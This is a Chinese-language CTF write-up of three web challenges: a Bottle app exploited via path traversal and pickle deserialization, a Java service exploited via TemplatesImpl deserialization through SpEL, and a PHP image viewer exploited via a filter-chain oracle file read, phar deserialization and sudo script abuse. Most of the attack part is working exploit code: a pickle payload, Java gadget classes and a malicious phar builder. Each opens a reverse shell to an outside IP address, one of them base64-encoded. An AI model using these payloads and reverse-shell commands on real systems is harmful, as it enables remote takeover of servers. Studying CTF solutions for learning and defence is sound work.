最近在忙聯(lián)通的安全準入測試，很少有時間看CTF了，今晚抽點時間回顧下上周線下的題(期末還沒開始復習😢)

感覺做滲透測試一半的時間在和甲方掰扯&水垃圾洞，沒啥驚喜感，還是CTF有意思

目錄

Mountain

ez_zhuawa

圖片信息查看器

---

Mountain

掃目錄

訪問./display看到

?提示是photo參數(shù)，/display?photo=Mountain1.png訪問到圖片

可以任意讀文件?

沒法直接讀環(huán)境變量?

?

抓包看響應頭，是python題?

?一般就去讀當前運行文件

/display?photo=/proc/1/cmdline

/display?photo=/appppp/app.py

?

from bottle import Bottle, route, run, template, request, response
from config.D0g3_GC import Mountain
import os
import remessages = []@route("/")
def home():return template("index")@route("/hello")
def hello_world():try:session = request.get_cookie("name", secret=Mountain)if not session or session["name"] == "guest":session = {"name": "guest"}response.set_cookie("name", session, secret=Mountain)return template("guest", name=session["name"]) if session["name"] == "admin" else Noneexcept:return "hacker!!! I've caught you"@route("/display")
def get_image():photo = request.query.get('photo')if photo is None:return template('display')if re.search("^../|environ|self", photo):return "Hacker!!! I'll catch you no matter what you do!!!"requested_path = os.path.join(os.getcwd(), "picture", photo)try:if photo.endswith('.png'):default_png_path = "/appppp/picture/"pngrequested_path = default_png_path + photowith open(pngrequested_path, 'rb') as f:tfile = f.read()response.content_type = 'image/png'else:with open(requested_path) as f:tfile = f.read()except Exception as e:return "you have some errors, continue to try again"return tfile@route("/admin")
def admin():session = request.get_cookie("name", secret=Mountain)if session and session["name"] == "admin":return template("administator", messages=messages)else:return "No permission!!!!"if __name__ == "__main__":os.chdir(os.path.dirname(__file__))run(host="0.0.0.0", port=8089)

?接著訪問./hello

給了一段Cookie，可以看到?后面的特征很像pickle序列化數(shù)據(jù)

審計代碼發(fā)現(xiàn)可以打pickle反序列化

先去訪問/display?photo=/appppp/config/D0g3_GC.py拿到secretkey

?

拿惡意cookie的最簡單方式就是自己起一個服務

from bottle import Bottle, route, run, template, request, response
import osMountain="M0UNTA1ND0G3GCYYDSP0EM5S20I314Y0UARE50SMAR7"
class Test:def __reduce__(self):return (eval, ("""__import__('os').system('bash -c "bash -i >& /dev/tcp/27.25.151.98/1337 0>&1"')""",))@route("/hello")
def hello_world():try:session = {"name": Test()}response.set_cookie("name", session, secret=Mountain)return "ok"except:return "hacker!!! I've caught you"if __name__ == "__main__":os.chdir(os.path.dirname(__file__))run(host="0.0.0.0", port=8089)

然后訪問，拿到惡意cookie?

?

替換后訪問靶機的./admin，成功反彈shell拿flag

?

?

ez_zhuawa

題目入口，先是將data反序列化，然后使用SPeL解析并執(zhí)行param表達式，表達式可以從反序列化對象中獲取值(即調getter方法)

?眾所周知TemplatesImpl的利用鏈如下，直接實例化TP然后調用它的getOutputProperties方法即可

TemplatesImpl#getOutputProperties() -> TemplatesImpl#newTransformer() -> TemplatesImpl#getTransletInstance() -> TemplatesImpl#defineTransletClasses() -> TransletClassLoader#defineClass()

而題目ban了一堆東西，就是沒ban TP

?

Evil.java

package org.example.GCCTF.exp;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import java.io.*;
import java.lang.reflect.Field;
import java.util.Base64;public class Exp {public static void main(String[] args) throws Exception {byte[] code=ClassPool.getDefault().get(Evil.class.getName()).toBytecode();byte[][] codes={code};TemplatesImpl templates=new TemplatesImpl();setFieldValue(templates,"_name","aaa");setFieldValue(templates,"_class",null);setFieldValue(templates,"_bytecodes",codes);byte[] result=serialize(templates);System.out.println(Base64.getEncoder().encodeToString(result));}public static  byte[] serialize(Object object) throws IOException {ByteArrayOutputStream byteArrayOutputStream=new ByteArrayOutputStream();ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);objectOutputStream.writeObject(object);return byteArrayOutputStream.toByteArray();}public static void setFieldValue(Object obj, String field, Object val) throws Exception {Field dField = obj.getClass().getDeclaredField(field);dField.setAccessible(true);dField.set(obj, val);}
}

Exp.java

package org.example.GCCTF.exp;import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import java.io.IOException;public class Evil extends AbstractTranslet {public void transform(DOM document, SerializationHandler[] handlers)throws TransletException {}public void transform(DOM document, DTMAxisIterator iterator,SerializationHandler handler) throws TransletException {}static {try {Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8yNy4yNS4xNTEuOTgvMTMzNyAwPiYx}|{base64,-d}|{bash,-i}");} catch (IOException e) {throw new RuntimeException(e);}}
}

最后param傳OutputProperties即可調用反序列化后的對象的getOutputProperties方法

?環(huán)境變量讀到flag

圖片信息查看器

提示有hI3t.php

進來是一個文件上傳功能和文件查詢功能，一眼phar反序列化

上傳圖片再讀取文件信息

?不難想到調用了getimagesize(不想到也行，總之與文件處理相關的函數(shù)都與filterchian leak沾邊)

PHP Filter鏈——基于oracle的文件讀取攻擊 - 先知社區(qū)

打filterchain讀文件

用下面這個工具

https://github.com/synacktiv/php_filter_chains_oracle_exploit?

python filters_chain_oracle_exploit.py --target http://125.70.243.22:31269/chal13nge.php --file '/var/www/html/hI3t.php' --parameter image_path

?

訪問./x@1.php，發(fā)現(xiàn)存在一個后門類

?生成惡意phar包

<?phpclass backdoor
{public $cmd;function __destruct(){$cmd = $this->cmd;system($cmd);}
}$a=new backdoor();
$a->cmd='bash -c "bash -i >& /dev/tcp/27.25.151.98/1337 0>&1"';
$phar = new Phar("gcb.phar");
$phar->startBuffering();
$phar->setStub("<php __HALT_COMPILER(); ?>");
$phar->setMetadata($a);
$phar->addFromString("test.txt", "test");
$phar->stopBuffering();

?將生成的gcb.phar改為gcb.png上傳，讀取

phar://uploads/gcb.png?

?

成功彈上shell

?

權限不夠需要提權

?

發(fā)現(xiàn)存在/tmp/rootscripts/check.sh的sudo權限

?

查看?/tmp/rootscripts/check.sh，發(fā)現(xiàn)可以任意run.sh腳本執(zhí)行

?

寫惡意sh文件?

echo "cat /root/flag" > /tmp/run.sh
chmod 777 /tmp/run.sh

再sudo執(zhí)行，拿到flag

sudo /tmp/rootscripts/check.sh "/tmp"

?